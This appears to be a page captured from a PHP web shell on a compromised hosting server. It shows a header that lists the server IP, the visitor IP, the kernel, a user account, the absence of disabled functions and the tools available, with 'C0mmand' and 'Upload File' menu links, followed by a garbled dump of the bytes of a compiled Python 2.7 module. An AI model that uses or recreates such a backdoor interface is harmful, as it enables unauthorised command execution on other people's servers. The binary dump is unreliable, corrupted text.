|
Server IP : 111.118.215.156 / Your IP : 216.73.216.167 Web Server : Apache System : Linux md-in-26.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : azasoqqa ( 1858) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/lib64/python2.7/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
�
�A�ic @ s� d Z d d l Z d d l Z d d d d d d d d
g Z d � Z d � Z d
� Z d � Z d � Z d � Z d � Z
d � Z d � Z d S( s�
Path operations common to more than one OS
Do not use directly. The OS specific modules import the appropriate
functions from this module themselves.
i����Nt commonprefixt existst getatimet getctimet getmtimet getsizet isdirt isfilec C s- y t j | � Wn t j k
r( t SXt S( sD Test whether a path exists. Returns False for broken symbolic links( t ost statt errort Falset True( t path( ( s# /usr/lib64/python2.7/genericpath.pyR s
c C s; y t j | � } Wn t j k
r* t SXt j | j � S( s% Test whether a path is a regular file( R R R
R t S_ISREGt st_mode( R
t st( ( s# /usr/lib64/python2.7/genericpath.pyR s
c C s; y t j | � } Wn t j k
r* t SXt j | j � S( s<